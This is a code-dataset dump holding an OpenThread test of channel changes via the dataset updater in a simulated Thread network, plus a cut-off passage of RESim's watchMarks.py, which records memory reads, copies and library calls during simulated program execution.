blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
49963aa42eca0c8863f99f8888c7d9229730ffd2
|
7bc1d8634529eac952490399fb71f10bcedf05cc
|
/tests/scripts/thread-cert/test_dataset_updater.py
|
ba3bc9f13861baee0e942a912d33e08fc3157ea2
|
[
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause"
] |
permissive
|
openthread/openthread
|
6a9e25d1cd224bde9796d9616f04f423dba27d77
|
102a631cb3f8938389d0d10199a14c59184039cd
|
refs/heads/main
| 2023-08-18T10:46:03.820124
| 2023-08-17T22:20:55
| 2023-08-17T22:20:55
| 55,808,787
| 3,485
| 1,296
|
BSD-3-Clause
| 2023-09-14T15:50:53
| 2016-04-08T20:47:41
|
C++
|
UTF-8
|
Python
| false
| false
| 4,104
|
py
|
test_dataset_updater.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2021, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
import config
import thread_cert
LEADER = 1
ROUTER = 2
MED = 3
SED = 4
class TestDatasetUpdater(thread_cert.TestCase):
SUPPORT_NCP = False
USE_MESSAGE_FACTORY = False
TOPOLOGY = {
LEADER: {
'mode': 'rdn',
'channel': 11,
},
ROUTER: {
'mode': 'rdn',
'channel': 11,
},
MED: {
'mode': 'rn',
'channel': 11,
'allowlist': [ROUTER],
},
SED: {
'mode': '-',
'channel': 11,
'timeout': config.DEFAULT_CHILD_TIMEOUT,
'allowlist': [ROUTER],
},
}
def test(self):
self.nodes[LEADER].start()
self.simulator.go(config.LEADER_STARTUP_DELAY)
self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
self.nodes[ROUTER].start()
self.simulator.go(config.ROUTER_STARTUP_DELAY)
self.assertEqual(self.nodes[ROUTER].get_state(), 'router')
self.nodes[MED].start()
self.simulator.go(5)
self.assertEqual(self.nodes[MED].get_state(), 'child')
self.nodes[SED].start()
self.simulator.go(5)
self.assertEqual(self.nodes[SED].get_state(), 'child')
self.verify_state(11)
# update initiated by LEADER
self.nodes[LEADER].start_dataset_updater(channel=12)
self.simulator.go(120)
self.verify_state(12)
# update initiated by ROUTER
self.nodes[ROUTER].start_dataset_updater(channel=13)
self.simulator.go(120)
self.verify_state(13)
# update initiated by LEADER overridden by ROUTER
self.nodes[LEADER].start_dataset_updater(channel=14)
self.simulator.go(20)
self.nodes[ROUTER].start_dataset_updater(channel=15)
self.simulator.go(120)
self.verify_state(15)
# update initiated by ROUTER overridden by LEADER
self.nodes[ROUTER].start_dataset_updater(channel=16)
self.simulator.go(10)
self.nodes[LEADER].start_dataset_updater(channel=17)
self.simulator.go(120)
self.verify_state(17)
def verify_state(self, channel):
self.assertEqual(self.nodes[LEADER].get_channel(), channel)
self.assertEqual(self.nodes[ROUTER].get_channel(), channel)
self.assertEqual(self.nodes[MED].get_channel(), channel)
self.assertEqual(self.nodes[SED].get_channel(), channel)
if __name__ == '__main__':
unittest.main()
|
894b6dbb3db197cfedf462f6e8b299e95589eb00
|
daa60221ed36dc8e20dd0a2a96521ffa2bdc94c5
|
/simics/monitorCore/watchMarks.py
|
50b2906a087a2a66a6735ee385ccc93addecea0f
|
[
"BSD-2-Clause"
] |
permissive
|
mfthomps/RESim
|
7dbddc1d46653c0443dec9c7930517753bbe5e78
|
cc83ed799cd37934e1659e1d20abf6c36449e0bf
|
refs/heads/master
| 2023-08-10T04:27:36.365806
| 2023-06-29T15:22:55
| 2023-06-29T15:22:55
| 183,653,459
| 160
| 30
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 53,929
|
py
|
watchMarks.py
|
from simics import Sim_Trans_Load
import pickle
import json
import os
import sys
class CallMark():
def __init__(self, msg, max_len, recv_addr, length, fd, is_lib=False):
if recv_addr is not None:
if max_len is not None:
self.msg = '%s addr: 0x%x length: %d max_len: %d' % (msg, recv_addr, length, max_len)
else:
self.msg = '%s addr: 0x%x length: %d' % (msg, recv_addr, length)
else:
self.msg = msg
self.max_len = max_len
self.recv_addr = recv_addr
self.len = length
self.fd = fd
self.is_lib = is_lib
def getMsg(self):
return self.msg
class CopyMark():
def __init__(self, src, dest, length, buf_start, op_type, strcpy=False, sp=None, truncated=None):
self.src = src
self.dest = dest
self.length = length
self.buf_start = buf_start
self.op_type = op_type
self.strcpy = strcpy
self.sp = sp
if op_type == Sim_Trans_Load:
if buf_start is not None:
offset = src - buf_start
trunc_string = ''
if truncated is not None:
trunc_string = ' (trucated from %d)' % truncated
self.msg = 'Copy %d bytes%s from 0x%08x to 0x%08x . (from offset %d into buffer at 0x%x)' % (length, trunc_string, src, dest, offset, buf_start)
else:
self.msg = 'Copy %d bytes from 0x%x to 0x%08x . (Source buffer starts before known buffers!)' % (length, src, dest)
else:
if buf_start is not None:
if dest == buf_start:
self.msg = 'Modify Copy %d bytes from 0x%08x to 0x%08x . (to start of buffer at 0x%x)' % (length, src, dest, buf_start)
else:
offset = dest - buf_start
self.msg = 'Modify Copy %d bytes from 0x%08x to 0x%08x . (to offset %d into buffer at 0x%x)' % (length, src, dest, offset, buf_start)
elif length is not None:
self.msg = 'Modify Copy %d bytes from 0x%08x to 0x%08x . Buffer unknown!)' % (length, src, dest, )
else:
self.msg = 'Modify Copy length is none, not where wth'
def getMsg(self):
return self.msg
class SetMark():
def __init__(self, dest, length, buf_start, lgr):
self.dest = dest
self.length = length
self.buf_start = buf_start
if buf_start is not None:
offset = dest - buf_start
self.msg = 'memset %d bytes starting 0x%x (offset %d into buffer at 0x%x)' % (length, dest, offset, buf_start)
else:
offset = 0
self.msg = 'memset %d bytes starting 0x%x **Not a known buffer' % (length, dest)
lgr.debug(self.msg)
def getMsg(self):
return self.msg
class DataMark():
def __init__(self, addr, start, length, cmp_ins, trans_size, lgr, modify=False, ad_hoc=False, dest=None, sp=None, note=None, value=None):
self.lgr = lgr
self.addr = addr
''' offset into the buffer starting at start '''
if addr is not None:
self.offset = addr - start
else:
self.offset = None
''' start is the start of the accessed buffer '''
self.start = start
''' length of the accessed buffer '''
self.length = length
self.cmp_ins = cmp_ins
''' only used if multiple iterations, or ad-hoc data copy. reflects the last address read from.'''
if ad_hoc:
self.end_addr = addr+trans_size-1
#self.lgr.debug('DataMark ad_hoc end_addr is now 0x%x' % self.end_addr)
else:
self.end_addr = None
self.loop_count = 0
self.modify = modify
self.ad_hoc = ad_hoc
self.trans_size = trans_size
self.dest = dest
self.sp = sp
self.note = note
self.value = value
''' keep value after a reset '''
self.was_ad_hoc = False
#self.lgr.debug('DataMark addr 0x%x start 0x%x length %d, offset %d' % (addr, start, length, self.offset))
def getMsg(self):
if self.start is None:
mark_msg = 'Error getting mark message'
elif self.modify and self.addr is not None:
mark_msg = 'Write %d to 0x%08x offset %4d into 0x%08x (buf size %4d)' % (self.trans_size, self.addr, self.offset, self.start, self.length)
elif self.addr is None:
mark_msg = 'Memory mod reset, original buffer %d bytes starting at 0x%x' % (self.length, self.start)
elif self.end_addr is None:
offset_string = ''
if self.offset != 0 or self.trans_size != self.length:
offset_string = 'offset %4d into 0x%08x (buf size %4d)' % (self.offset, self.start, self.length)
if self.note is None:
mark_msg = 'Read %d from 0x%08x %s %s' % (self.trans_size, self.addr, offset_string, self.cmp_ins)
else:
mark_msg = '%s %d bytes into dest 0x%08x from 0x%08x %s %s' % (self.note, self.trans_size, self.dest, self.addr, offset_string, self.cmp_ins)
elif self.ad_hoc or self.was_ad_hoc:
copy_length = (self.end_addr - self.addr) + 1
#self.lgr.debug('DataMark getMsg ad-hoc length is %d' % copy_length)
if self.start is not None:
if copy_length == self.length and self.start == self.addr:
mark_msg = 'Copy %d bytes from 0x%08x to 0x%08x . Ad-hoc' % (copy_length, self.addr, self.dest)
else:
offset = self.addr - self.start
mark_msg = 'Copy %d bytes from 0x%08x to 0x%08x . Ad-hoc (from offset %d into buffer at 0x%x)' % (copy_length, self.addr, self.dest, offset, self.start)
else:
mark_msg = 'Copy %d bytes from 0x%08x to 0x%08x . Ad-hoc (Source buffer starts before known buffers!)' % (copy_length, self.addr, self.dest)
else:
copy_length = self.end_addr- self.addr + 1
mark_msg = 'Iterate %d times over 0x%08x-0x%08x (%d bytes) starting offset %4d into 0x%8x (buf size %4d) %s' % (self.loop_count, self.addr,
self.end_addr, copy_length, self.offset, self.start, self.length, self.cmp_ins)
return mark_msg
def addrRange(self, addr):
self.end_addr = addr
self.loop_count += 1
#self.lgr.debug('DataMark addrRange end_addr now 0x%x loop_count %d' % (self.end_addr, self.loop_count))
def noAdHoc(self):
if self.ad_hoc:
self.was_ad_hoc = True
self.ad_hoc = False
class KernelMark():
def __init__(self, addr, count, callnum, fd):
self.addr = addr
self.count = count
self.callnum = callnum
self.fd = fd
self.msg = 'Kernel read %d bytes from 0x%x call_num: %d FD: %d' % (count, addr, callnum, fd)
def getMsg(self):
return self.msg
class KernelModMark():
def __init__(self, addr, count, callnum, fd):
self.addr = addr
self.count = count
self.callnum = callnum
self.fd = fd
self.msg = 'Kernel overwrote %d bytes from 0x%x call_num: %d FD: %d' % (count, addr, callnum, fd)
def getMsg(self):
return self.msg
class CompareMark():
def __init__(self, fun, ours, theirs, count, src_str, dest_str, buf_start):
self.src_str = src_str
self.dst_str = dest_str
self.fun = fun
self.ours = ours
self.theirs = theirs
self.count = count
if buf_start is not None:
offset = ours - buf_start
self.msg = '%s 0x%x %s (%d bytes into buffer at 0x%x) to %s (at 0x%x, %d bytes)' % (fun, ours, src_str, offset, buf_start, dest_str, theirs, count)
else:
self.msg = '%s 0x%x %s (unknown buffer) to %s (at 0x%x, %d bytes)' % (fun, ours, src_str, dest_str, theirs, count)
def getMsg(self):
return self.msg
class StrChrMark():
def __init__(self, start, the_chr, count):
self.the_chr = the_chr
self.start = start
self.count = count
if self.the_chr > 20 and self.the_chr < 256:
self.msg = 'strchr in string at 0x%x find 0x%x(%s) ' % (start, self.the_chr, chr(self.the_chr))
else:
self.msg = 'strchr in string at 0x%x find 0x%x' % (start, self.the_chr)
def getMsg(self):
return self.msg
class StrtousMark():
def __init__(self, fun, src):
self.src = src
self.msg = '%s at 0x%x' % (fun, self.src)
def getMsg(self):
return self.msg
class ScanMark():
def __init__(self, src, dest, count, buf_start, sp):
self.src = src
self.dest = dest
self.count = count
self.buf_start = buf_start
self.sp = sp
if dest is None:
self.msg = 'sscanf failed to parse from 0x%x' % src
else:
self.msg = 'sscanf src 0x%x to 0x%x' % (src, dest)
def getMsg(self):
return self.msg
class XMLPropMark():
def __init__(self, src, count, the_str, result):
self.src = src
self.count = count
self.msg = 'xmlProp %s src 0x%x len %d. Prop: %s' % (the_str, src, count, result)
def getMsg(self):
return self.msg
class InetAddrMark():
def __init__(self, src, count, the_str):
self.src = src
self.count = count
self.msg = 'InetAddr %s src 0x%x len %d' % (the_str, src, count)
def getMsg(self):
return self.msg
class InetNtopMark():
def __init__(self, dest, count, the_str):
self.dest = dest
self.count = count
self.msg = 'InetAddr %s dest 0x%x len %d' % (the_str, dest, count)
def getMsg(self):
return self.msg
class LenMark():
def __init__(self, src, count):
self.src = src
self.count = count
self.msg = 'strlen src 0x%x len %d' % (src, count)
def getMsg(self):
return self.msg
class SprintfMark():
def __init__(self, fun, src, dest, count, buf_start, sp):
self.fun = fun
self.src = src
self.dest = dest
self.count = count
self.buf_start = buf_start
self.sp = sp
self.msg = '%s src: 0x%x dest 0x%x len %d' % (fun, src, dest, count)
def getMsg(self):
return self.msg
class FprintfMark():
def __init__(self, fun, src):
self.fun = fun
self.src = src
self.msg = '%s src 0x%x' % (fun, src)
def getMsg(self):
return self.msg
class FwriteMark():
def __init__(self, fun, src, count):
self.fun = fun
self.src = src
self.count = count
self.msg = '%s src 0x%x count %d' % (fun, src, count)
def getMsg(self):
return self.msg
class GlobMark():
def __init__(self, fun, src, count):
self.fun = fun
self.src = src
self.count = count
self.msg = '%s src 0x%x count %d' % (fun, src, count)
def getMsg(self):
return self.msg
class IteratorMark():
def __init__(self, fun, addr, buf_start):
self.fun = fun
self.addr = addr
if buf_start is None:
self.msg = 'iterator %s %x No buffer start found?)' % (fun, addr)
else:
offset = addr - buf_start
self.msg = 'iterator %s %x (%d bytes into buffer at 0x%x)' % (fun, addr, offset, buf_start)
def getMsg(self):
return self.msg
class MallocMark():
def __init__(self, addr, size):
self.addr = addr
self.size = size
self.msg = 'malloc addr: 0x%x size: %d' % (addr, size)
def getMsg(self):
return self.msg
class FreeMark():
def __init__(self, addr, fun):
self.addr = addr
self.msg = '%s addr: 0x%x' % (fun, addr)
def getMsg(self):
return self.msg
class FreeXMLMark():
def __init__(self):
self.msg = 'FreeXMLDoc'
def getMsg(self):
return self.msg
class XMLParseFileMark():
def __init__(self, addr, size):
self.addr = addr
self.size = size
self.msg = 'xmlParseFile addr: 0x%x size: %d' % (addr, size)
def getMsg(self):
return self.msg
class GetTokenMark():
def __init__(self, src, dest, the_string):
self.addr = src
self.msg = 'GetToken addr: 0x%x token: %s' % (src, the_string)
def getMsg(self):
return self.msg
class StrPtr():
def __init__(self, fun, the_string):
self.msg = '%s string: %s' % (fun, the_string)
def getMsg(self):
return self.msg
class ReturnInt():
def __init__(self, fun, value):
self.msg = '%s value: %s' % (fun, value)
def getMsg(self):
return self.msg
class ResetOrigin():
def __init__(self, origin_watches, new_msg):
if new_msg is None:
self.msg = 'Reset origin with %d data watches' % len(origin_watches)
else:
self.msg = new_msg
self.origin_watches = origin_watches
def getMsg(self):
return self.msg
class LogMark():
def __init__(self, s, prefix):
self.msg = '%s : %s' % (prefix, s)
def getMsg(self):
return self.msg
class PushMark():
def __init__(self, addr, dest, buf_start, length, ip, push_size):
self.addr = addr
self.dest = dest
self.length = length
self.start = buf_start
self.ip = ip
if addr == buf_start and length == push_size:
self.msg = 'push from 0x%x to 0x%x' % (addr, dest)
else:
offset = addr - buf_start
self.msg = 'push from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x' % (addr, offset, buf_start, dest)
def getMsg(self):
return self.msg
class FGetsMark():
def __init__(self, fun, addr, dest, count, start):
self.addr = addr
self.dest = dest
self.length = count
self.start = start
if start is not None:
offset = addr - start
self.msg = 'fgets from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x' % (addr, offset, start, dest)
else:
self.msg = 'fgets from 0x%08x (unknown buffer?) to 0x%08x' % (addr, dest)
def getMsg(self):
return self.msg
class StringMark():
def __init__(self, fun, src, dest, count, start):
self.src = src
self.dest = dest
self.length = count
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x %d bytes' % (fun, src, offset, start, dest, count)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x %d bytes' % (fun, src, dest, count)
def getMsg(self):
return self.msg
class ReplaceMark():
def __init__(self, fun, src, dest, pos, length, start):
self.src = src
self.dest = dest
self.pos = pos
self.length = length
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x pos: %d, %d bytes' % (fun, src, offset, start, dest, pos, length)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x pos %d, %d bytes' % (fun, src, dest, pos, length)
def getMsg(self):
return self.msg
class AppendMark():
def __init__(self, fun, src, dest, length, start):
self.src = src
self.dest = dest
self.length = length
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x %d bytes' % (fun, src, offset, start, dest, length)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x %d bytes' % (fun, src, dest, length)
def getMsg(self):
return self.msg
class AssignMark():
def __init__(self, fun, src, dest, length, start):
self.src = src
self.dest = dest
self.length = length
self.start = start
if start is not None:
offset = src - start
self.msg = '%s from 0x%08x (offset %d within buffer starting at 0x%08x) to 0x%08x %d bytes' % (fun, src, offset, start, dest, length)
else:
self.msg = '%s from 0x%08x (unknown buffer?) to 0x%08x %d bytes' % (fun, src, dest, length)
def getMsg(self):
return self.msg
class CharLookupMark():
def __init__(self, addr, stuff, length):
self.addr = addr
self.end_addr = addr
self.length = length
self.stuff = stuff
def extend(self):
self.end_addr = self.end_addr+1
def getMsg(self):
if self.length is not None:
length = self.length
else:
length = self.end_addr - self.addr
msg = 'Char Lookup buffer at 0x%x len %d, %s' % (self.addr, length, self.stuff)
return msg
class CharPtrMark():
def __init__(self, addr, ptr, value):
self.addr = addr
self.ptr = ptr
self.value = value
def getMsg(self):
msg = 'Char Ptr reference at 0x%x, pointer to 0x%x value: 0x%x' % (self.addr, self.ptr, self.value)
return msg
class MscMark():
def __init__(self, fun, addr):
self.addr = addr
if addr is not None:
self.msg = '%s read 0x%x' % (fun, addr)
else:
self.msg = '%s read None' % (fun)
def getMsg(self):
return self.msg
class WatchMarks():
def __init__(self, top, mem_utils, cpu, cell_name, run_from_snap, lgr):
self.mark_list = []
''' Previous marks that are no longer reachable due to origin resets '''
self.stale_marks = []
self.mem_utils = mem_utils
self.cpu = cpu
self.top = top
self.cell_name = cell_name
self.lgr = lgr
self.call_cycle = None
self.prev_ip = []
self.recent_buf_address = None
self.recent_buf_max_len = None
if run_from_snap is not None:
self.loadPickle(run_from_snap)
''' will store so map with saved json files '''
self.so_map = None
def saveMarks(self, fpath):
with open(fpath, 'w') as fh:
i = 1
for mark in self.stale_marks:
the_str = mark.mark.getMsg().encode('utf-8', 'ignore')
fh.write('%d %s ip:0x%x cycle: 0x%x\n' % (i, the_str, mark.ip, mark.cycle))
i += 1
fh.write('\n\nBegin active watch marks.\n\n')
i = 1
for mark in self.mark_list:
the_str = mark.mark.getMsg().encode('utf-8', 'ignore')
fh.write('%d %s ip:0x%x cycle: 0x%x\n' % (i, the_str, mark.ip, mark.cycle))
i += 1
def showMarks(self, old=False, verbose=False):
i = 1
if old:
for mark in self.stale_marks:
cycle = ' '
if verbose:
cycle = ' 0x%x ' % mark.cycle
print('%d%s%s ip:0x%x pid:%d' % (i, cycle, mark.mark.getMsg(), mark.ip, mark.pid))
i += 1
print('Begin active watch marks.')
elif len(self.stale_marks)>0:
print('%d stale marks not displayed. use old=True to see them.' % len(self.stale_marks))
i = 1
for mark in self.mark_list:
cycle = ' '
if verbose:
cycle = ' 0x%x ' % mark.cycle
print('%d%s%s ip:0x%x pid:%d' % (i, cycle, mark.mark.getMsg(), mark.ip, mark.pid))
i += 1
self.lgr.debug('watchMarks, showed %d marks' % len(self.mark_list))
class WatchMark():
''' Objects that are listed as watch marks -- highest level stored in mark_list'''
def __init__(self, return_cycle, call_cycle, ip, pid, mark):
self.cycle = return_cycle
self.call_cycle = call_cycle
self.ip = ip
self.pid = pid
self.mark = mark
def getJson(self, origin):
retval = {}
retval['cycle'] = self.cycle - origin
retval['ip'] = self.ip
retval['pid'] = self.pid
retval['msg'] = self.mark.getMsg()
return retval
def recordIP(self, ip):
self.prev_ip.append(ip)
if len(self.prev_ip) > 4:
self.prev_ip.pop(0)
def markCall(self, msg, max_len, recv_addr=None, length=None, fd=None, is_lib=False):
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
cm = CallMark(msg, max_len, recv_addr, length, fd, is_lib=is_lib)
cycles = self.cpu.cycles
self.addWatchMark(cm, cycles=cycles)
if recv_addr is None:
self.lgr.debug('watchMarks markCall ip: 0x%x cycles: 0x%x %s' % (ip, cycles, msg))
else:
self.lgr.debug('watchMarks markCall ip: 0x%x cycles: 0x%x %s wrote to: 0x%x' % (ip, cycles, msg, recv_addr))
if self.recent_buf_address is None:
self.recent_buf_address = recv_addr
self.recent_buf_max_len = max_len
self.recordIP(ip)
def resetOrigin(self, origin_watches, reuse_msg=False, record_old=False):
old_msg = None
if reuse_msg:
old_origin = self.getMarkFromIndex(1)
if old_origin is not None:
old_msg = old_origin.mark.getMsg()
self.clearWatchMarks(record_old=record_old)
ro = ResetOrigin(origin_watches, new_msg=old_msg)
self.addWatchMark(ro)
self.lgr.debug('watchMarks resetOrigin')
def memoryMod(self, start, length, trans_size, addr=None):
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
dm = DataMark(addr, start, length, None, trans_size, self.lgr, modify=True)
self.addWatchMark(dm)
''' DO NOT DELETE THIS LOG ENTRY, used in testing '''
self.lgr.debug('watchMarks memoryMod 0x%x msg:<%s> -- Appended, len of mark_list now %d' % (ip, dm.getMsg(), len(self.mark_list)))
def dataRead(self, addr, start, length, cmp_ins, trans_size, ad_hoc=False, dest=None, note=None, ip=None, cycles=None):
if ip is None:
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
wm = None
''' TBD generalize for loops that make multiple refs? '''
if ip not in self.prev_ip and not ad_hoc and not note:
value = self.mem_utils.readBytes(self.cpu, addr, trans_size)
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr, value=int.from_bytes(value, byteorder='little', signed=False))
wm = self.addWatchMark(dm, ip=ip, cycles=cycles)
''' DO NOT DELETE THIS LOG ENTRY, used in testing '''
self.lgr.debug('watchMarks dataRead ip: 0x%x %s appended, cycle: 0x%x len of mark_list now %d' % (ip, dm.getMsg(), self.cpu.cycles, len(self.mark_list)))
self.prev_ip = []
elif ad_hoc:
if len(self.mark_list) > 0:
pm = self.mark_list[-1]
if isinstance(pm.mark, DataMark) and pm.mark.ad_hoc and pm.mark.end_addr is not None and addr == (pm.mark.end_addr+1):
end_addr = addr + trans_size - 1
#self.lgr.debug('watchMarks dataRead extend range for add 0x%x to 0x%x' % (addr, end_addr))
pm.mark.addrRange(end_addr)
else:
#self.lgr.debug('watchMarks create new ad hoc data mark for read from 0x%x, ref buffer start 0x%x, len %d dest 0x%x, trans size %d cycle 0x%x' % (addr, start, length, dest, trans_size, self.cpu.cycles))
#sp, base = self.getStackBase(dest)
sp = self.isStackBuf(dest)
#self.lgr.debug('sp is %s' % str(sp))
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr, ad_hoc=True, dest=dest, sp=sp)
wm = self.addWatchMark(dm)
else:
self.lgr.warning('watchMarks dataRead, ad_hoc but empty mark list')
elif note is not None:
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr, note=note, dest=dest)
wm = self.addWatchMark(dm)
#self.lgr.debug('watchMarks dataRead with note ip: 0x%x %s' % (ip, dm.getMsg()))
else:
if len(self.prev_ip) > 0:
pm = self.mark_list[-1]
#self.lgr.debug('pm class is %s' % pm.mark.__class__.__name__)
if isinstance(pm.mark, DataMark):
pm.mark.addrRange(addr)
if pm.mark.ad_hoc:
#self.lgr.debug('watchMarks was add-hoc, but this is not, so reset it')
pm.mark.noAdHoc()
#self.lgr.debug('watchMarks dataRead 0x%x range 0x%x' % (ip, addr))
else:
dm = DataMark(addr, start, length, cmp_ins, trans_size, self.lgr)
wm = self.addWatchMark(dm, cycles=cycles)
#self.lgr.debug('watchMarks dataRead followed something other than DataMark 0x%x %s' % (ip, dm.getMsg()))
self.recordIP(ip)
return wm
def getMarkFromIndex(self, index):
index = index -1
if index < len(self.mark_list):
return self.mark_list[index]
else:
return None
def getWatchMarks(self, origin=0):
retval = []
self.lgr.debug('watchMarks getWatchMarks len is %d' % len(self.mark_list))
for mark in self.mark_list:
retval.append(mark.getJson(origin))
return retval
def isCall(self, index):
index = index -1
self.lgr.debug('watchMarks isCall type of index %d is %s' % (index, type(self.mark_list[index].mark)))
if isinstance(self.mark_list[index].mark, CallMark):
if self.mark_list[index].mark.is_lib:
return False
else:
return True
else:
return False
def getIP(self, index):
index = index-1
if index < len(self.mark_list):
#self.lgr.debug('watchMarks getCycle index %d len %s cycle: 0x%x' % (index, len(self.mark_list), self.mark_list[index].cycle))
return self.mark_list[index].ip
else:
return None
def getCycle(self, index):
index = index-1
if index < len(self.mark_list):
#self.lgr.debug('watchMarks getCycle index %d len %s cycle: 0x%x' % (index, len(self.mark_list), self.mark_list[index].cycle))
return self.mark_list[index].cycle
else:
return None
def removeRedundantDataMark(self, dest):
if len(self.prev_ip) > 0:
pm = self.mark_list[-1]
if isinstance(pm.mark, DataMark):
if pm.mark.addr == dest:
''' a copy record for the same data read previously recorded, remove the redundant data read '''
self.lgr.debug('watchMarks removeRedundantDataMark ')
del self.mark_list[-1]
def isCopyMark(self, mark):
if mark.mark.__class__.__name__ in ['CopyMark', 'StringMark', 'ReplaceMark', 'AppendMark', 'AssignMark']:
return True
else:
return False
def getMarkCopyOffset(self, address):
''' Intended for reverse data tracking. If a CopyMark is found encompassing the given address, return the
source address that corresponds to the given destination address. '''
retval = None
offset = None
ret_mark = None
cycle = self.cpu.cycles
for mark in self.mark_list:
if mark.call_cycle is not None and mark.cycle is not None and cycle >= mark.call_cycle and cycle <= mark.cycle:
if self.isCopyMark(mark):
if address >= mark.mark.dest and address <= (mark.mark.dest+mark.mark.length):
#math = mark.mark.dest+mark.mark.length
#self.lgr.debug('getMarkCopyOffset found that address 0x%x is between 0x%x len %d (0x%x)' % (address, mark.mark.dest, mark.mark.length, math))
offset = address - mark.mark.dest
retval = mark.mark.src+offset
#self.lgr.debug('and... the offset from dest is %d. The src was 0x%x, plus the offset gives 0x%x' % (offset, mark.mark.src, retval))
ret_mark = mark
else:
self.lgr.debug('watchMarks getMarkCopyOffset found cycle, but not a copy, is type %s. %s' % (mark.mark.__class__.__name__, mark.mark.getMsg()))
break
return retval, offset, ret_mark
def getCopyMark(self):
''' If currently in a copy function, return the associated mark '''
retval = None
cycle = self.cpu.cycles
for mark in self.mark_list:
if mark.cycle is None or mark.call_cycle is None:
self.lgr.debug('getCopyMark no call_cycle for mark %s' % mark)
continue
if cycle >= mark.call_cycle and cycle <= mark.cycle:
if self.isCopyMark(mark):
retval = mark
break
return retval
def addWatchMark(self, mark, cycles=None, ip=None):
if self.so_map is None:
self.so_map = json.loads(self.top.getSOMap(quiet=True))
if self.so_map is None:
self.lgr.error('watchMarks addWatchMark, so_map is None')
else:
self.lgr.debug('dataWatch addWatchMark got so_map')
if ip is None:
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
pid = self.top.getPID()
if cycles is None:
cycles = self.cpu.cycles
wm = self.WatchMark(cycles, self.call_cycle, ip, pid, mark)
self.mark_list.append(wm)
#self.lgr.debug('addWatchMark len now %d' % len(self.mark_list))
return wm
def isStackBuf(self, dest):
sp = self.mem_utils.getRegValue(self.cpu, 'sp')
if dest >= sp:
return True
else:
return False
def getStackBase(self, dest):
base = None
sp = None
if self.cpu.architecture != 'arm':
sp = self.mem_utils.getRegValue(self.cpu, 'sp')
base = self.mem_utils.getRegValue(self.cpu, 'ebp')
if dest is not None and dest > sp and dest <= base:
''' copy is to a stack buffer. Record so it can be deleted when opportuntity arises '''
pass
else:
sp = None
base = None
else:
st = self.top.getStackTraceQuiet(max_frames=2, max_bytes=1000)
if st is None:
self.lgr.debug('getStackBase stack trace is None, wrong pid?')
return
frames = st.getFrames(2)
for f in frames:
self.lgr.debug(f.dumpString())
if len(frames) > 1:
next_frame = frames[1]
if next_frame.instruct.startswith('bl'):
sp = self.mem_utils.getRegValue(self.cpu, 'sp')
base = next_frame.sp
else:
self.lgr.debug('watchMarks getStackBase, next frame does not look like an lr return, unable to delete temporary stack frame?')
return sp, base
